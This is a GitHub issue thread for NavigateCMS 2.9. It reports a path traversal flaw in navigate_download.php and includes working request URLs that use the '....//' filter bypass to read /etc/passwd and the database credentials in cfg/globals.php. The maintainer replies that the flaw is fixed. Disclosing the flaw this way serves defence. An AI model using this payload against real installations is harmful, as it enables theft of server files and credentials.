search

NavigateCMS / Navigate-CMS

Navigate CMS, a very powerful open source content management system for everybody.
http://www.navigatecms.com
GNU General Public License v2.0
8 stars 4 forks source link

arbitrary file read vulnerability in NavigateCMS 2.9 #28

Closed bkfish closed 2 years ago

bkfish commented 2 years ago

exp

after login ,we can see our sid in cookies image for example my sid is 161099c65675803ecc8de95ae08d3e12 then you can get arbitrary file by /navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd image /navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php you can get some Sensitive information such as mysql user/password

analysis

location:navigate_download.php image and in navigate\lib\core\core.php image we can rewrite bypass this filter.

suggest

you can use replace('../', "hacker") rather than replace('../', "")

NavigateCMS commented 2 years ago

Fixed by fabb4718d7c6a4e0bdf02800d55d7de2cf492261

Thank you very much bkfish!